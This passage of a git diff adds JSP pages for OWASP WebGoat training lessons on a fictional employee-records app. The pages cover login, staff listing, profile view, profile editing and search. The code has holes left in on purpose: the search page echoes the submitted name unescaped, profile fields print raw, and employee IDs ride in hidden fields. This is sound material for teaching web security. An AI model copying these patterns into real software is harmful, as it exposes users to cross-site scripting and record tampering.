+						<span class="lesson_text_db"><%=employee.getCcnLimit()%></span>
+					</TD>
+				</TR>
+				<TR><TD>
+						Comments: 
+					</TD>
+					<TD colspan="3">
+						<span class="lesson_text_db"><%=employee.getPersonalDescription()%></span>
+					</TD>
+				</TR>				
+				<TR>
+					<TD colspan="2">	
+						Disciplinary Explanation: 
+					</TD>
+					<TD>				
+						Disc. Dates: 
+					</TD>
+					<TD>
+						<span class="lesson_text_db"><%=employee.getDisciplinaryActionDate()%></span>
+					</TD>
+				<TR>
+					<TD colspan="4">
+						<span class="lesson_text_db"><%=employee.getDisciplinaryActionNotes()%></span>
+					</TD>
+				</TR>
+				<TR>
+				<TD>				
+						Manager: 
+					</TD>
+					<TD>
+						<span class="lesson_text_db"><%=employee.getManager()%></span>
+					</TD>	
+				</TR>
+				</Table>
+		</div>
+		<div class="lesson_buttons_bottom">
+		    <table width="460" height="20" border="0" cellpadding="0" cellspacing="0">
+                 <tr>
+                 	<td width="50">
+					 <%					
+					 if (webSession.isAuthorizedInLesson(webSession.getUserIdInLesson(), GoatHillsFinancial.LISTSTAFF_ACTION))
+					 {
+					 %>
+						<form method="POST" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+							<input type="hidden" name="<%=GoatHillsFinancial.EMPLOYEE_ID%>" value="<%=employee.getId()%>">
+							<input type="submit" name="action" value="<%=GoatHillsFinancial.LISTSTAFF_ACTION%>"/>
+						</form>
+					 <%
+					 }%>
+					 </td>
+		             <td width="50">
+					 <%					
+					 if (webSession.isAuthorizedInLesson(webSession.getUserIdInLesson(), GoatHillsFinancial.EDITPROFILE_ACTION))
+					 {
+					 %>
+						<form method="POST" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+							<input type="hidden" name="<%=GoatHillsFinancial.EMPLOYEE_ID%>" value="<%=employee.getId()%>">
+							<input type="submit" name="action" value="<%=GoatHillsFinancial.EDITPROFILE_ACTION%>"/>
+						</form>
+					<%
+					}
+					%>
+					</td>					
+                    <td width="60">
+					<%					
+					if (webSession.isAuthorizedInLesson(webSession.getUserIdInLesson(), GoatHillsFinancial.DELETEPROFILE_ACTION))
+					{
+					%>
+						<form method="POST" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+							<input type="hidden" name="<%=GoatHillsFinancial.EMPLOYEE_ID%>" value="<%=employee.getId()%>">
+							<input type="submit" name="action" value="<%=GoatHillsFinancial.DELETEPROFILE_ACTION%>"/>
+						</form>
+					<%
+					}
+					%>
+					</td>
+                      <td width="190">&nbsp;</td>
+                      <td width="76">
+						<form method="POST">
+							<input type="submit" name="action" value="<%=GoatHillsFinancial.LOGOUT_ACTION%>"/>
+						</form>
+					</td>
+				</tr>
+         	</table>
+		</div>
\ No newline at end of file
diff --git a/main/project/WebContent/lessons/GoatHillsFinancial/error.jsp b/main/project/WebContent/lessons/GoatHillsFinancial/error.jsp
new file mode 100755
index 000000000..a3294f134
--- /dev/null
+++ b/main/project/WebContent/lessons/GoatHillsFinancial/error.jsp
@@ -0,0 +1,13 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial"
+	errorPage="" %>
+<%
+	WebSession webSession = ((WebSession)session.getAttribute("websession"));
+//	int myUserId = getIntSessionAttribute(webSession, "GoatHillsFinancial." + GoatHillsFinancial.USER_ID);
+%>
+<br><br><br>An error has occurred.
+<br><br><br>
+<form method="POST" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+
+ <input type="submit" name="action" value="<%=GoatHillsFinancial.LOGIN_ACTION%>"/>
+</form>
\ No newline at end of file
diff --git a/main/project/WebContent/lessons/GoatHillsFinancial/images/accessControl.jpg b/main/project/WebContent/lessons/GoatHillsFinancial/images/accessControl.jpg
new file mode 100755
index 000000000..e9af72c50
Binary files /dev/null and b/main/project/WebContent/lessons/GoatHillsFinancial/images/accessControl.jpg differ
diff --git a/main/project/WebContent/lessons/GoatHillsFinancial/images/dbSchema.jpg b/main/project/WebContent/lessons/GoatHillsFinancial/images/dbSchema.jpg
new file mode 100755
index 000000000..457b634d0
Binary files /dev/null and b/main/project/WebContent/lessons/GoatHillsFinancial/images/dbSchema.jpg differ
diff --git a/main/project/WebContent/lessons/GoatHillsFinancial/images/lesson1_SearchWindow.jpg b/main/project/WebContent/lessons/GoatHillsFinancial/images/lesson1_SearchWindow.jpg
new file mode 100755
index 000000000..39e1ed80d
Binary files /dev/null and b/main/project/WebContent/lessons/GoatHillsFinancial/images/lesson1_SearchWindow.jpg differ
diff --git a/main/project/WebContent/lessons/GoatHillsFinancial/images/lesson1_header.jpg b/main/project/WebContent/lessons/GoatHillsFinancial/images/lesson1_header.jpg
new file mode 100755
index 000000000..60a809af0
Binary files /dev/null and b/main/project/WebContent/lessons/GoatHillsFinancial/images/lesson1_header.jpg differ
diff --git a/main/project/WebContent/lessons/GoatHillsFinancial/images/lesson1_loginWindow.jpg b/main/project/WebContent/lessons/GoatHillsFinancial/images/lesson1_loginWindow.jpg
new file mode 100755
index 000000000..c91f8a052
Binary files /dev/null and b/main/project/WebContent/lessons/GoatHillsFinancial/images/lesson1_loginWindow.jpg differ
diff --git a/main/project/WebContent/lessons/GoatHillsFinancial/images/lesson1_menu.jpg b/main/project/WebContent/lessons/GoatHillsFinancial/images/lesson1_menu.jpg
new file mode 100755
index 000000000..2c9512571
Binary files /dev/null and b/main/project/WebContent/lessons/GoatHillsFinancial/images/lesson1_menu.jpg differ
diff --git a/main/project/WebContent/lessons/GoatHillsFinancial/images/lesson1_workspace.jpg b/main/project/WebContent/lessons/GoatHillsFinancial/images/lesson1_workspace.jpg
new file mode 100755
index 000000000..292d25654
Binary files /dev/null and b/main/project/WebContent/lessons/GoatHillsFinancial/images/lesson1_workspace.jpg differ
diff --git a/main/project/WebContent/lessons/GoatHillsFinancial/images/orgChart.jpg b/main/project/WebContent/lessons/GoatHillsFinancial/images/orgChart.jpg
new file mode 100755
index 000000000..016c0d162
Binary files /dev/null and b/main/project/WebContent/lessons/GoatHillsFinancial/images/orgChart.jpg differ
diff --git a/main/project/WebContent/lessons/RoleBasedAccessControl/EditProfile.jsp b/main/project/WebContent/lessons/RoleBasedAccessControl/EditProfile.jsp
new file mode 100644
index 000000000..467c53f04
--- /dev/null
+++ b/main/project/WebContent/lessons/RoleBasedAccessControl/EditProfile.jsp
@@ -0,0 +1,137 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl" 
+	errorPage="" %>
+<%
+	WebSession webSession = ((WebSession)session.getAttribute("websession"));
+	Employee employee = (Employee) session.getAttribute("RoleBasedAccessControl.Employee");
+%>
+		<div class="lesson_title_box"><strong>Welcome Back </strong><span class="lesson_text_db"><%=webSession.getUserNameInLesson()%></span> - Edit Profile Page</div>
+		<div class="lesson_text">
+			<form id="form1" name="form1" method="post" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+<Table border="0" cellpadding="0" cellspacing="0">
+				<TR><TD width="110">
+						First Name:
+					</TD>
+					<TD width="193">
+						<input class="lesson_text_db" name="<%=RoleBasedAccessControl.FIRST_NAME%>" type="text" value="<%=employee.getFirstName()%>"/>
+				  </TD>
+					<TD width="110">				
+						Last Name:					</TD>
+					<TD width="196">
+					 	<input class="lesson_text_db" name="<%=RoleBasedAccessControl.LAST_NAME%>" type="text" value="<%=employee.getLastName()%>"/>
+				  </TD>
+				</TR>
+				<TR><TD>				
+						Street: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=RoleBasedAccessControl.ADDRESS1%>" type="text" value="<%=employee.getAddress1()%>"/>
+					</TD>
+					<TD>				
+						City/State: 
+					<TD>
+						<input class="lesson_text_db" name="<%=RoleBasedAccessControl.ADDRESS2%>" type="text" value="<%=employee.getAddress2()%>"/>
+					</TD>
+				</TR>
+				<TR><TD>
+						Phone: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=RoleBasedAccessControl.PHONE_NUMBER%>" type="text" value="<%=employee.getPhoneNumber()%>"/>
+					</TD>
+					<TD>				
+						Start Date: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=RoleBasedAccessControl.START_DATE%>" type="text" value="<%=employee.getStartDate()%>"/>
+					</TD>
+				</TR>
+				<TR><TD>
+			    		SSN: 
+			    	</TD>
+			    	<TD>
+			    		<input class="lesson_text_db" name="<%=RoleBasedAccessControl.SSN%>" type="text" value="<%=employee.getSsn()%>"/> 
+					</TD>
+					<TD>				
+						Salary: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=RoleBasedAccessControl.SALARY%>" type="text" value="<%=employee.getSalary()%>"/>
+					</TD>
+				</TR>
+				<TR><TD>
+						Credit Card: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=RoleBasedAccessControl.CCN%>" type="text" value="<%=employee.getCcn()%>"/>
+					</TD>
+					<TD>				
+						Credit Card Limit: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=RoleBasedAccessControl.CCN_LIMIT%>" type="text" value="<%=employee.getCcnLimit()%>"/>
+					</TD>
+				</TR>
+				<TR><TD>
+						Comments: 
+					</TD>
+					<TD colspan="3">
+						<input name="<%=RoleBasedAccessControl.DESCRIPTION%>" type="text" class="lesson_text_db" value="<%=employee.getPersonalDescription()%>" size="58"/>
+					</TD>
+				<TR>
+					<TD colspan="2">				
+						Disciplinary Explanation:  
+					</TD>
+					<TD>			
+						Disc. Date:
+					</TD>
+					<TD>			
+						<input class="lesson_text_db" name="<%=RoleBasedAccessControl.DISCIPLINARY_DATE%>" type="text" value="<%=employee.getDisciplinaryActionDate()%>"/>
+					</TD>
+				</TR>
+				<TR>
+					<TD colspan="4">
+						<textarea name="<%=RoleBasedAccessControl.DISCIPLINARY_NOTES%>" cols="53" rows="2" wrap="off" class="lesson_text_db" ><%=employee.getDisciplinaryActionNotes()%></textarea>
+					</TD>
+				</TR>
+				<TR>	
+				<TD>				
+						Manager: 
+					</TD>
+					<TD>
+						<select class="lesson_text_db" name="<%=RoleBasedAccessControl.MANAGER%>">
+						<%
+				      	List employees = (List) session.getAttribute("RoleBasedAccessControl.Staff");
+				      	Iterator i = employees.iterator();
+						while (i.hasNext())
+						{
+							EmployeeStub stub = (EmployeeStub) i.next();
+								%>
+								<option value="<%=Integer.toString(stub.getId())%>"><%=stub.getFirstName() + " " + stub.getLastName()%></option>
+						<%}%>
+						</select>
+					</TD>	
+				</TR>
+				</Table>
+				<BR>
+				<div class="lesson_buttons_bottom">
+				<table width="460" height="20" border="0" cellpadding="0" cellspacing="0">
+               		<tr>
+                     		<td width="57">
+							<input type="submit" name="action" value="<%=RoleBasedAccessControl.VIEWPROFILE_ACTION%>"/>
+				  		</td>
+				  		
+                       	<td width="81">
+ 							<input name="<%=RoleBasedAccessControl.EMPLOYEE_ID%>" type="hidden" value="<%=employee.getId()%>">
+							<input name="<%=RoleBasedAccessControl.TITLE%>" type="hidden" value="<%=employee.getTitle()%>">
+							<input type="submit" name="action" value="<%=RoleBasedAccessControl.UPDATEPROFILE_ACTION%>"/>
+						</td>
+                        	<td width="211"></td>
+                        	<td width="83">
+	 						<input type="submit" name="action" value="<%=RoleBasedAccessControl.LOGOUT_ACTION%>"/>
+						</td>
+                 	</tr>
+              	</table>			
+			</div></form>
+		</div>
+		
\ No newline at end of file
diff --git a/main/project/WebContent/lessons/RoleBasedAccessControl/ListStaff.jsp b/main/project/WebContent/lessons/RoleBasedAccessControl/ListStaff.jsp
new file mode 100644
index 000000000..a3c2158de
--- /dev/null
+++ b/main/project/WebContent/lessons/RoleBasedAccessControl/ListStaff.jsp
@@ -0,0 +1,55 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl" 
+	errorPage="" %>
+<%
+	WebSession webSession = ((WebSession)session.getAttribute("websession"));
+	int myUserId = webSession.getUserIdInLesson();
+%>
+	<div class="lesson_title_box"><strong>Welcome Back </strong><span class="lesson_text_db"><%=webSession.getUserNameInLesson()%></span> - Staff Listing Page</div>
+		<br>
+		<br>
+		<br>
+		<p>Select from the list below	</p>
+
+		<form id="form1" name="form1" method="post" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+  <table width="60%" border="0" cellpadding="3">
+    <tr>
+      <td>  <label>
+  <select name="<%=RoleBasedAccessControl.EMPLOYEE_ID%>" size="11">
+			      	<%
+			      	List employees = (List) session.getAttribute("RoleBasedAccessControl." + RoleBasedAccessControl.STAFF_ATTRIBUTE_KEY);
+			      	Iterator i = employees.iterator();
+					while (i.hasNext())
+					{
+						EmployeeStub stub = (EmployeeStub) i.next();%>
+						<option value="<%=Integer.toString(stub.getId())%>"><%=stub.getFirstName() + " " + stub.getLastName()+ " (" + stub.getRole() + ")"%></option><%
+					}%>
+  </select>
+  </label></td>
+      <td>
+	        	<input type="submit" name="action" value="<%=RoleBasedAccessControl.SEARCHSTAFF_ACTION%>"/><br>
+	        	<input type="submit" name="action" value="<%=RoleBasedAccessControl.VIEWPROFILE_ACTION%>"/><br>
+            		<% 
+				if (webSession.isAuthorizedInLesson(myUserId, RoleBasedAccessControl.CREATEPROFILE_ACTION))
+				{
+				%>
+					<input type="submit" name="action" value="<%=RoleBasedAccessControl.CREATEPROFILE_ACTION%>"/><br>
+				<% 
+				}
+				%>
+            		<% 
+				if (webSession.isAuthorizedInLesson(myUserId, RoleBasedAccessControl.DELETEPROFILE_ACTION))
+				{
+				%>
+					<input type="submit" name="action" value="<%=RoleBasedAccessControl.DELETEPROFILE_ACTION%>"/><br>
+				<% 
+				}
+				%>
+			<br>
+					<input type="submit" name="action" value="<%=RoleBasedAccessControl.LOGOUT_ACTION%>"/>
+	  </td>
+    </tr>
+  </table>
+
+		</form>
+		
\ No newline at end of file
diff --git a/main/project/WebContent/lessons/RoleBasedAccessControl/Login.jsp b/main/project/WebContent/lessons/RoleBasedAccessControl/Login.jsp
new file mode 100644
index 000000000..6e97a55e5
--- /dev/null
+++ b/main/project/WebContent/lessons/RoleBasedAccessControl/Login.jsp
@@ -0,0 +1,32 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl" 
+	errorPage="" %>
+	<div id="lesson_login">
+		<div id="lesson_login_txt">
+			<% 
+			WebSession webSession = ((WebSession)session.getAttribute("websession"));
+			%>
+			<form id="form1" name="form1" method="post" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+			    	<label>
+			      	<select name="<%=RoleBasedAccessControl.EMPLOYEE_ID%>">
+			      	<%
+			      	//System.out.println("Retrieving employees list");
+			      	List employees = (List) session.getAttribute("RoleBasedAccessControl." + RoleBasedAccessControl.STAFF_ATTRIBUTE_KEY);
+			      	Iterator i = employees.iterator();
+					while (i.hasNext())
+					{
+						EmployeeStub stub = (EmployeeStub) i.next();
+					%>
+			      	<option value="<%=Integer.toString(stub.getId())%>"><%=stub.getFirstName() + " " + stub.getLastName() + " (" + stub.getRole() + ")"%></option>
+					<%}%>
+	                </select>
+		        </label>
+				<br>
+			    	<label>Password
+			    		<input name="password" type="password" size="10" maxlength="8" />
+			    </label>
+				<br>
+				<input type="submit" name="action" value="<%=RoleBasedAccessControl.LOGIN_ACTION%>"/>
+			</form>
+		</div>
+	</div>
\ No newline at end of file
diff --git a/main/project/WebContent/lessons/RoleBasedAccessControl/RoleBasedAccessControl.css b/main/project/WebContent/lessons/RoleBasedAccessControl/RoleBasedAccessControl.css
new file mode 100644
index 000000000..f38977fcf
--- /dev/null
+++ b/main/project/WebContent/lessons/RoleBasedAccessControl/RoleBasedAccessControl.css
@@ -0,0 +1,14 @@
+#lesson_wrapper {height: 435px;width: 500px;}
+#lesson_header {background-image: url(lessons/RoleBasedAccessControl/images/lesson1_header.jpg);width: 490px;padding-right: 10px;padding-top: 60px;background-repeat: no-repeat;}
+.lesson_workspace {background-image: url(lessons/RoleBasedAccessControl/images/lesson1_workspace.jpg);width: 489px;height: 325px;padding-left: 10px;padding-top: 10px;background-repeat: no-repeat;}
+.lesson_text {height: 240px;width: 460px;padding-top: 5px;}
+#lesson_buttons_bottom {height: 20px;width: 460px;}
+#lesson_b_b_left {width: 300px;float: left;}
+#lesson_b_b_right input {width: 100px;float: right;}
+.lesson_title_box {height: 20px;width: 420px;padding-left: 30px;}
+.lesson_workspace { }
+.lesson_txt_10 {font-family: Arial, Helvetica, sans-serif;font-size: 10px;}
+.lesson_text_db {color: #0066FF}
+#lesson_login {background-image: url(lessons/RoleBasedAccessControl/images/lesson1_loginWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}
+#lesson_login_txt {font-family: Arial, Helvetica, sans-serif;font-size: 12px;text-align: center;}
+#lesson_search {background-image: url(lessons/RoleBasedAccessControl/images/lesson1_SearchWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}
diff --git a/main/project/WebContent/lessons/RoleBasedAccessControl/RoleBasedAccessControl.jsp b/main/project/WebContent/lessons/RoleBasedAccessControl/RoleBasedAccessControl.jsp
new file mode 100644
index 000000000..7afc1c789
--- /dev/null
+++ b/main/project/WebContent/lessons/RoleBasedAccessControl/RoleBasedAccessControl.jsp
@@ -0,0 +1,26 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl" 
+	errorPage="" %>
+<style>
+<jsp:include page="RoleBasedAccessControl.css" />
+</style>
+<%
+WebSession webSession = ((WebSession)session.getAttribute("websession"));
+RoleBasedAccessControl currentLesson = (RoleBasedAccessControl) webSession.getCurrentLesson();
+%>
+<div id="lesson_wrapper">
+	<div id="lesson_header"></div>
+	<div class="lesson_workspace">
+	<%
+	String subViewPage = currentLesson.getPage(webSession);
+	if (subViewPage != null)
+	{
+		//System.out.println("Including sub view page: " + subViewPage);
+	%>
+	<jsp:include page="<%=subViewPage%>" />
+	<%
+	}
+	%>
+
+	</div>
+</div>
\ No newline at end of file
diff --git a/main/project/WebContent/lessons/RoleBasedAccessControl/SearchStaff.jsp b/main/project/WebContent/lessons/RoleBasedAccessControl/SearchStaff.jsp
new file mode 100644
index 000000000..a9a9f3af2
--- /dev/null
+++ b/main/project/WebContent/lessons/RoleBasedAccessControl/SearchStaff.jsp
@@ -0,0 +1,22 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl" 
+	errorPage="" %>
+	<div id="lesson_search">
+			<% 
+			WebSession webSession = ((WebSession)session.getAttribute("websession"));
+			String searchedName = request.getParameter(RoleBasedAccessControl.SEARCHNAME);
+			if (searchedName != null)
+			{
+			%>
+				Employee <%=searchedName%> not found.
+			<%
+			}
+			%>
+				<form id="form1" name="form1" method="post" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+			    	<label>Name
+					<input class="lesson_text_db" type="text" name="<%=RoleBasedAccessControl.SEARCHNAME%>"/>
+		        </label>
+				<br>
+				<input type="submit" name="action" value="<%=RoleBasedAccessControl.FINDPROFILE_ACTION%>"/>
+			</form>
+	</div>
\ No newline at end of file
diff --git a/main/project/WebContent/lessons/RoleBasedAccessControl/ViewProfile.jsp b/main/project/WebContent/lessons/RoleBasedAccessControl/ViewProfile.jsp
new file mode 100644
index 000000000..896eec8f3
--- /dev/null
+++ b/main/project/WebContent/lessons/RoleBasedAccessControl/ViewProfile.jsp
@@ -0,0 +1,157 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl" 
+	errorPage="" %>
+<%
+	Employee employee = (Employee) session.getAttribute("RoleBasedAccessControl." + RoleBasedAccessControl.EMPLOYEE_ATTRIBUTE_KEY);
+	WebSession webSession = ((WebSession)session.getAttribute("websession"));
+//	int myUserId = getIntSessionAttribute(webSession, "RoleBasedAccessControl." + RoleBasedAccessControl.USER_ID);
+%>
+		<div class="lesson_title_box"><strong>Welcome Back </strong><span class="lesson_text_db"><%=webSession.getUserNameInLesson()%></span> - View Profile Page</div>
+		<div class="lesson_text">
+				<Table>
+				<TR><TD>
+						First Name:
+					</TD>
+					<TD>
+						<span class="lesson_text_db"><%=employee.getFirstName()%></span>
+					</TD>
+					<TD>				
+						Last Name:
+					</TD>
+					<TD>
+					 	<span class="lesson_text_db"><%=employee.getLastName()%></span>
+					</TD>
+				</TR>
+				<TR><TD>				
+						Street: 
+					</TD>
+					<TD>
+						<span class="lesson_text_db"><%=employee.getAddress1()%></span>
+					</TD>
+					<TD>				
+						City/State: 
+					<TD>
+						<span class="lesson_text_db"><%=employee.getAddress2()%></span>
+					</TD>
+				</TR>
+				<TR><TD>
+						Phone: 
+					</TD>
+					<TD>
+						<span class="lesson_text_db"><%=employee.getPhoneNumber()%></span>
+					</TD>
+					<TD>				
+						Start Date: 
+					</TD>
+					<TD>
+						<span class="lesson_text_db"><%=employee.getStartDate()%></span>
+					</TD>
+				</TR>
+				<TR><TD>
+			    		SSN: 
+			    	</TD>
+			    	<TD>
+			    		<span class="lesson_text_db"><%=employee.getSsn()%></span>
+					</TD>
+					<TD>				
+						Salary: 
+					</TD>
+					<TD>
+						<span class="lesson_text_db"><%=employee.getSalary()%></span>
+					</TD>
+				</TR>
+				<TR><TD>
+						Credit Card: 
+					</TD>
+					<TD>
+						<span class="lesson_text_db"><%=employee.getCcn()%></span>
+					</TD>
+					<TD>				
+						Credit Card Limit: 
+					</TD>
+					<TD>
+						<span class="lesson_text_db"><%=employee.getCcnLimit()%></span>
+					</TD>
+				</TR>
+				<TR><TD>
+						Comments: 
+					</TD>
+					<TD colspan="3">
+						<span class="lesson_text_db"><%=employee.getPersonalDescription()%></span>
+					</TD>
+				</TR>				
+				<TR>
+					<TD colspan="2">	
+						Disciplinary Explanation: 
+					</TD>
+					<TD>				
+						Disc. Dates: 
+					</TD>
+					<TD>
+						<span class="lesson_text_db"><%=employee.getDisciplinaryActionDate()%></span>
+					</TD>
+				<TR>
+					<TD colspan="4">
+						<span class="lesson_text_db"><%=employee.getDisciplinaryActionNotes()%></span>
+					</TD>
+				</TR>
+				<TR>
+				<TD>				
+						Manager: 
+					</TD>
+					<TD>
+						<span class="lesson_text_db"><%=employee.getManager()%></span>
+					</TD>	
+				</TR>
+				</Table>
+		</div>
+		<div class="lesson_buttons_bottom">
+		    <table width="460" height="20" border="0" cellpadding="0" cellspacing="0">
+                 <tr>
+                 	<td width="50">
+					 <%					
+					 if (webSession.isAuthorizedInLesson(webSession.getUserIdInLesson(), RoleBasedAccessControl.LISTSTAFF_ACTION))
+					 {
+					 %>
+						<form method="POST" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+							<input type="hidden" name="<%=RoleBasedAccessControl.EMPLOYEE_ID%>" value="<%=employee.getId()%>">
+							<input type="submit" name="action" value="<%=RoleBasedAccessControl.LISTSTAFF_ACTION%>"/>
+						</form>
+					 <%
+					 }%>
+					 </td>
+		             <td width="50">
+					 <%					
+					 if (webSession.isAuthorizedInLesson(webSession.getUserIdInLesson(), RoleBasedAccessControl.EDITPROFILE_ACTION))
+					 {
+					 %>
+						<form method="POST" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+							<input type="hidden" name="<%=RoleBasedAccessControl.EMPLOYEE_ID%>" value="<%=employee.getId()%>">
+							<input type="submit" name="action" value="<%=RoleBasedAccessControl.EDITPROFILE_ACTION%>"/>
+						</form>
+					<%
+					}
+					%>
+					</td>					
+                    <td width="60">
+					<%					
+					if (webSession.isAuthorizedInLesson(webSession.getUserIdInLesson(), RoleBasedAccessControl.DELETEPROFILE_ACTION))
+					{
+					%>
+						<form method="POST" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+							<input type="hidden" name="<%=RoleBasedAccessControl.EMPLOYEE_ID%>" value="<%=employee.getId()%>">
+							<input type="submit" name="action" value="<%=RoleBasedAccessControl.DELETEPROFILE_ACTION%>"/>
+						</form>
+					<%
+					}
+					%>
+					</td>
+                      <td width="190">&nbsp;</td>
+                      <td width="76">
+						<form method="POST">
+							<input type="submit" name="action" value="<%=RoleBasedAccessControl.LOGOUT_ACTION%>"/>
+						</form>
+					</td>
+				</tr>
+         	</table>
+		</div>
\ No newline at end of file
diff --git a/main/project/WebContent/lessons/RoleBasedAccessControl/error.jsp b/main/project/WebContent/lessons/RoleBasedAccessControl/error.jsp
new file mode 100644
index 000000000..419740ee7
--- /dev/null
+++ b/main/project/WebContent/lessons/RoleBasedAccessControl/error.jsp
@@ -0,0 +1,13 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl"
+	errorPage="" %>
+<%
+	WebSession webSession = ((WebSession)session.getAttribute("websession"));
+//	int myUserId = getIntSessionAttribute(webSession, "RoleBasedAccessControl." + RoleBasedAccessControl.USER_ID);
+%>
+<br><br><br>An error has occurred.
+<br><br><br>
+<form method="POST" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+
+ <input type="submit" name="action" value="<%=RoleBasedAccessControl.LOGIN_ACTION%>"/>
+</form>
\ No newline at end of file
diff --git a/main/project/WebContent/lessons/RoleBasedAccessControl/images/accessControl.jpg b/main/project/WebContent/lessons/RoleBasedAccessControl/images/accessControl.jpg
new file mode 100644
index 000000000..e9af72c50
Binary files /dev/null and b/main/project/WebContent/lessons/RoleBasedAccessControl/images/accessControl.jpg differ
diff --git a/main/project/WebContent/lessons/RoleBasedAccessControl/images/dbSchema.jpg b/main/project/WebContent/lessons/RoleBasedAccessControl/images/dbSchema.jpg
new file mode 100644
index 000000000..457b634d0
Binary files /dev/null and b/main/project/WebContent/lessons/RoleBasedAccessControl/images/dbSchema.jpg differ
diff --git a/main/project/WebContent/lessons/RoleBasedAccessControl/images/lesson1_SearchWindow.jpg b/main/project/WebContent/lessons/RoleBasedAccessControl/images/lesson1_SearchWindow.jpg
new file mode 100644
index 000000000..39e1ed80d
Binary files /dev/null and b/main/project/WebContent/lessons/RoleBasedAccessControl/images/lesson1_SearchWindow.jpg differ
diff --git a/main/project/WebContent/lessons/RoleBasedAccessControl/images/lesson1_header.jpg b/main/project/WebContent/lessons/RoleBasedAccessControl/images/lesson1_header.jpg
new file mode 100644
index 000000000..60a809af0
Binary files /dev/null and b/main/project/WebContent/lessons/RoleBasedAccessControl/images/lesson1_header.jpg differ
diff --git a/main/project/WebContent/lessons/RoleBasedAccessControl/images/lesson1_loginWindow.jpg b/main/project/WebContent/lessons/RoleBasedAccessControl/images/lesson1_loginWindow.jpg
new file mode 100644
index 000000000..c91f8a052
Binary files /dev/null and b/main/project/WebContent/lessons/RoleBasedAccessControl/images/lesson1_loginWindow.jpg differ
diff --git a/main/project/WebContent/lessons/RoleBasedAccessControl/images/lesson1_menu.jpg b/main/project/WebContent/lessons/RoleBasedAccessControl/images/lesson1_menu.jpg
new file mode 100644
index 000000000..2c9512571
Binary files /dev/null and b/main/project/WebContent/lessons/RoleBasedAccessControl/images/lesson1_menu.jpg differ
diff --git a/main/project/WebContent/lessons/RoleBasedAccessControl/images/lesson1_workspace.jpg b/main/project/WebContent/lessons/RoleBasedAccessControl/images/lesson1_workspace.jpg
new file mode 100644
index 000000000..292d25654
Binary files /dev/null and b/main/project/WebContent/lessons/RoleBasedAccessControl/images/lesson1_workspace.jpg differ
diff --git a/main/project/WebContent/lessons/RoleBasedAccessControl/images/orgChart.jpg b/main/project/WebContent/lessons/RoleBasedAccessControl/images/orgChart.jpg
new file mode 100644
index 000000000..016c0d162
Binary files /dev/null and b/main/project/WebContent/lessons/RoleBasedAccessControl/images/orgChart.jpg differ
diff --git a/main/project/WebContent/lessons/SQLInjection/EditProfile.jsp b/main/project/WebContent/lessons/SQLInjection/EditProfile.jsp
new file mode 100644
index 000000000..38ca58086
--- /dev/null
+++ b/main/project/WebContent/lessons/SQLInjection/EditProfile.jsp
@@ -0,0 +1,133 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.SQLInjection.SQLInjection" 
+	errorPage="" %>
+<%
+	WebSession webSession = ((WebSession)session.getAttribute("websession"));
+	Employee employee = (Employee) session.getAttribute("SQLInjection.Employee");
+%>
+		<div class="lesson_title_box"><strong>Welcome Back </strong><span class="lesson_text_db"><%=webSession.getUserNameInLesson()%></span></div>
+		<div class="lesson_text">
+			<form id="form1" name="form1" method="post" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+				<Table>
+				<TR><TD>
+						First Name:
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=SQLInjection.FIRST_NAME%>" type="text" value="<%=employee.getFirstName()%>"/>
+					</TD>
+					<TD>				
+						Last Name:
+					</TD>
+					<TD>
+					 	<input class="lesson_text_db" name="<%=SQLInjection.LAST_NAME%>" type="text" value="<%=employee.getLastName()%>"/>
+					</TD>
+				</TR>
+				<TR><TD>				
+						Street: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=SQLInjection.ADDRESS1%>" type="text" value="<%=employee.getAddress1()%>"/>
+					</TD>
+					<TD>				
+						City/State: 
+					<TD>
